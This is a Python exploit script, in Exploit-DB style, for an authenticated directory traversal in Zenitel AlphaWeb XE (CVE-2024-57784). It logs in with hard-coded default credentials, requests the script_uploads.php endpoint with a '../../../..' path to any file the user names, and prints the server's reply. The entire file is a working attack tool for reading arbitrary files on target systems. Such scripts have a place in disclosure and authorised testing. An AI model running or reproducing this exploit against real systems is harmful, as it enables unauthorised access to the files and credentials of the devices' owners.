import requests
import argparse
import base64

#Default Credentials
script_user = "scripter"
script_pw = "alphascript"

art = """
[*] Exploit Title: Authenticated Directory Traversal Vulnerability on Zenitel AlphaWeb XE Version 11.2.3.10
[*] Date: 08/02/2025
[*] Exploit Author: Safvan Parakkal
[*] Vendor Website: https://www.zenitel.com/
[*] CVE: CVE-2024-57784
"""

print(art)


def get_args():
	parser = argparse.ArgumentParser()
	parser.add_argument('-u', '--url', required=True, action='store', help="Target URL")
	parser.add_argument('-f', '--file', required=True, action='store', help='The file to read')
	my_args = parser.parse_args()
	return my_args


def main():
	args = get_args()
	base_url = args.url
	file_to_read = args.file
	vuln_url = base_url + "/php/script_uploads.php?action=get_file&file=../../../.." + args.file

	authorization = "Basic" + " " + str(base64.b64encode((script_user+':'+script_pw).encode('ascii')).decode('ascii'))

	login_headers = {
	"Authorization": authorization,
	"User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.5.59 (like Safari/604.1)",
	"Accept": 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
	"Cookie": "PHPSESSID=74db36a51834159c981252197d29a8fb",
	"Accept-Language": "en-US,en;q=0.5",
	"Accept-Encoding": 'gzip, deflate, br',
	"Connection": "keep-alive",
	}

	try:

		response = requests.get(vuln_url, headers=login_headers)

		if response.status_code == 200:
			print(f"[*] Reading the file '{file_to_read}'")
			print("======================================")
			print(response.text)
			print("======================================")
			return
		else:
			print("[-] Payload failed or file content not found.")
	except requests.RequestException as e:
		print(f"[!] Request failed: {e}")
		return

if __name__ == "__main__":
	main()